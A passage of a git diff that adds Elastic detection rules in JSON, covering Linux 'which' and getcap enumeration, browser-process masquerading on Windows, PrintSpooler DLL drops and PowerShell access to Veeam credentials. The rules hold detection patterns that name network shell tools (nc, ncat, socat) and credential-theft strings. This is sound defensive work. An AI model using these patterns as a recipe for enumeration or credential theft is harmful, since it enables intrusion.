\"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "5b06a27f-ad72-4499-91db-0c69667bffa5_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_4.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_4.json new file mode 100644 index 00000000000..bce414651e0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_4.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious which Enumeration", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count >= 10 and not process.parent.name == \"jem\" and \nnot process.args == \"--tty-only\"\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5b18eef4-842c-4b47-970f-f08d24004bde", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "5b18eef4-842c-4b47-970f-f08d24004bde_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_5.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_5.json new file mode 100644 index 00000000000..db599c813ce --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_5.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious which Enumeration", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"which\" and process.args_count >= 10 and not process.parent.name == \"jem\" and \nnot process.args == \"--tty-only\"\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5b18eef4-842c-4b47-970f-f08d24004bde", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "5b18eef4-842c-4b47-970f-f08d24004bde_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_3.json b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_3.json new file mode 100644 index 00000000000..294a96780e4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_3.json @@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies suspicious instances of browser processes, such as unsigned or signed with unusual certificates, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as Browser Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n /* Chrome Related Processes */\n (process.name : (\n \"chrome.exe\", \"GoogleUpdate.exe\", \"GoogleCrashHandler64.exe\", \"GoogleCrashHandler.exe\",\n \"GoogleUpdateComRegisterShell64.exe\", \"GoogleUpdateSetup.exe\", \"GoogleUpdateOnDemand.exe\",\n \"chrome_proxy.exe\", \"remote_assistance_host.exe\", \"remoting_native_messaging_host.exe\",\n \"GoogleUpdateBroker.exe\"\n ) and not\n (process.code_signature.subject_name : (\"Google LLC\", \"Google Inc\") and process.code_signature.trusted == true)\n and not\n (\n process.executable : (\n \"?:\\\\Program Files\\\\HP\\\\Sure Click\\\\servers\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\HP\\\\Sure Click\\\\*\\\\servers\\\\chrome.exe\"\n ) and\n process.code_signature.subject_name : (\"Bromium, Inc.\") and process.code_signature.trusted == true\n ) and not\n (\n process.executable : (\n \"?:\\\\Program Files\\\\dynatrace\\\\synthetic\\\\Chrome-bin\\\\chrome.exe\"\n ) and\n process.code_signature.subject_name : (\"Dynatrace LLC\") and process.code_signature.trusted == true\n ) and\n not (\n process.executable : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\ms-playwright\\\\chromium-*\\\\chrome-win\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\synthetics-recorder\\\\resources\\\\local-browsers\\\\chromium-*\\\\chrome-win\\\\chrome.exe\",\n \"*\\\\node_modules\\\\puppeteer\\\\.local-chromium\\\\win64-*\\\\chrome-win\\\\chrome.exe\",\n \"?:\\\\Program Files (x86)\\\\Invicti Professional Edition\\\\chromium\\\\chrome.exe\",\n \"?:\\\\Program Files\\\\End2End, Inc\\\\ARMS Html Engine\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\*BurpSuitePro\\\\burpbrowser\\\\*\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\*BurpSuite\\\\burpbrowser\\\\*\\\\chrome.exe\"\n ) and process.args: (\n \"--enable-features=NetworkService,NetworkServiceInProcess\",\n \"--type=crashpad-handler\", \"--enable-automation\", \"--disable-xss-auditor\"\n )\n )\n ) or\n\n /* MS Edge Related Processes */\n (process.name : (\n \"msedge.exe\", \"MicrosoftEdgeUpdate.exe\", \"identity_helper.exe\", \"msedgewebview2.exe\",\n \"MicrosoftEdgeWebview2Setup.exe\", \"MicrosoftEdge_X*.exe\", \"msedge_proxy.exe\",\n \"MicrosoftEdgeUpdateCore.exe\", \"MicrosoftEdgeUpdateBroker.exe\", \"MicrosoftEdgeUpdateSetup_X*.exe\",\n \"MicrosoftEdgeUpdateComRegisterShell64.exe\", \"msedgerecovery.exe\", \"MicrosoftEdgeUpdateSetup.exe\"\n ) and not\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n and not\n (\n process.name : \"msedgewebview2.exe\" and\n process.code_signature.subject_name : (\"Bromium, Inc.\", \"Amazon.com Services LLC\") and process.code_signature.trusted == true\n )\n ) or\n\n /* Brave Related Processes */\n (process.name : (\n \"brave.exe\", \"BraveUpdate.exe\", \"BraveCrashHandler64.exe\", \"BraveCrashHandler.exe\",\n \"BraveUpdateOnDemand.exe\", \"brave_vpn_helper.exe\", \"BraveUpdateSetup*.exe\",\n \"BraveUpdateComRegisterShell64.exe\"\n ) and not\n (process.code_signature.subject_name : \"Brave Software, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Firefox Related Processes */\n (process.name : (\n \"firefox.exe\", \"pingsender.exe\", \"default-browser-agent.exe\", \"maintenanceservice.exe\",\n \"plugin-container.exe\", \"maintenanceservice_tmp.exe\", \"maintenanceservice_installer.exe\",\n \"minidump-analyzer.exe\"\n ) and not\n (process.code_signature.subject_name : \"Mozilla Corporation\" and process.code_signature.trusted == true)\n and not\n (\n process.name : \"default-browser-agent.exe\" and\n process.code_signature.subject_name : (\"WATERFOX LIMITED\") and process.code_signature.trusted == true\n )\n ) or\n\n /* Island Related Processes */\n (process.name : (\n \"Island.exe\", \"IslandUpdate.exe\", \"IslandCrashHandler.exe\", \"IslandCrashHandler64.exe\",\n \"IslandUpdateBroker.exe\", \"IslandUpdateOnDemand.exe\", \"IslandUpdateComRegisterShell64.exe\",\n \"IslandUpdateSetup.exe\"\n ) and not\n (process.code_signature.subject_name : \"Island Technology Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Opera Related Processes */\n (process.name : (\n \"opera.exe\", \"opera_*.exe\", \"browser_assistant.exe\"\n ) and not\n (process.code_signature.subject_name : (\"Opera Norway AS\", \"Opera Software AS\") and process.code_signature.trusted == true)\n ) or\n\n /* Whale Related Processes */\n (process.name : (\n \"whale.exe\", \"whale_update.exe\", \"wusvc.exe\"\n ) and not\n (process.code_signature.subject_name : \"NAVER Corp.\" and process.code_signature.trusted == true)\n ) or\n\n /* Chromium-based Browsers processes */\n (process.name : (\n \"chrmstp.exe\", \"notification_helper.exe\", \"elevation_service.exe\"\n ) and not\n (process.code_signature.subject_name : (\n \"Island Technology Inc.\",\n \"Citrix Systems, Inc.\",\n \"Brave Software, Inc.\",\n \"Google LLC\",\n \"Google Inc\",\n \"Microsoft Corporation\",\n \"NAVER Corp.\",\n \"AVG Technologies USA, LLC\",\n \"Avast Software s.r.o.\",\n \"PIRIFORM SOFTWARE LIMITED\",\n \"NortonLifeLock Inc.\"\n ) and process.code_signature.trusted == true\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5b9eb30f-87d6-45f4-9289-2bf2024f0376", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "5b9eb30f-87d6-45f4-9289-2bf2024f0376_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_107.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_107.json new file mode 100644 index 00000000000..e426a4fdffc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_107.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious PrintSpooler Service Executable File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"spoolsv.exe\" and file.extension : \"dll\" and\n file.path : (\"?:\\\\Windows\\\\System32\\\\*\", \"?:\\\\Windows\\\\SysWOW64\\\\*\") and\n not file.path : (\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\PrintConfig.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\x5lrs.dll\",\n \"?:\\\\WINDOWS\\\\sysWOW64\\\\x5lrs.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\PrintConfig.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS\\\\x64\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS\\\\W32X86\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\PRTPROCS\\\\x64\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\{????????-????-????-????-????????????}\\\\*.dll\"\n )\n", + "references": [ + "https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/", + "https://www.thezdi.com/blog/2020/7/8/cve-2020-1300-remote-code-execution-through-microsoft-windows-cab-files" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_108.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_108.json new file mode 100644 index 00000000000..ffb6a9d144c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_108.json @@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious PrintSpooler Service Executable File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n process.name : \"spoolsv.exe\" and file.extension : \"dll\" and\n file.path : (\"?:\\\\Windows\\\\System32\\\\*\", \"?:\\\\Windows\\\\SysWOW64\\\\*\") and\n not file.path : (\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\PrintConfig.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\x5lrs.dll\",\n \"?:\\\\WINDOWS\\\\sysWOW64\\\\x5lrs.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\PrintConfig.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS\\\\x64\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS\\\\W32X86\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\PRTPROCS\\\\x64\\\\*.dll\",\n \"?:\\\\WINDOWS\\\\system32\\\\spool\\\\{????????-????-????-????-????????????}\\\\*.dll\"\n )\n", + "references": [ + "https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/", + "https://www.thezdi.com/blog/2020/7/8/cve-2020-1300-remote-code-execution-through-microsoft-windows-cab-files" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c351f54-4187-4ad8-abc8-29b0cfbef8b1_2.json b/packages/security_detection_engine/kibana/security_rule/5c351f54-4187-4ad8-abc8-29b0cfbef8b1_2.json new file mode 100644 index 00000000000..a004aa2e041 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c351f54-4187-4ad8-abc8-29b0cfbef8b1_2.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies recursive process capability enumeration of the entire filesystem through the getcap command. Malicious users may manipulate identified capabilities to gain root privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Capability Enumeration", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"getcap\" and process.args == \"-r\" and process.args == \"/\" and process.args_count == 3 and\nuser.id != \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5c351f54-4187-4ad8-abc8-29b0cfbef8b1", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "5c351f54-4187-4ad8-abc8-29b0cfbef8b1_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5c602cba-ae00-4488-845d-24de2b6d8055_1.json b/packages/security_detection_engine/kibana/security_rule/5c602cba-ae00-4488-845d-24de2b6d8055_1.json new file mode 100644 index 00000000000..ec3b429d5c2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5c602cba-ae00-4488-845d-24de2b6d8055_1.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that can access and decrypt Veeam credentials stored in MSSQL databases. Attackers can use Veeam Credentials to target backups as part of destructive operations such as Ransomware attacks.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Veeam Credential Access Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"[dbo].[Credentials]\" and\n (\"Veeam\" or \"VeeamBackup\")\n ) or\n \"ProtectedStorage]::GetLocalString\"\n )\n", + "references": [ + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://www.crowdstrike.com/blog/anatomy-of-alpha-spider-ransomware/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "5c602cba-ae00-4488-845d-24de2b6d8055", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 1 + }, 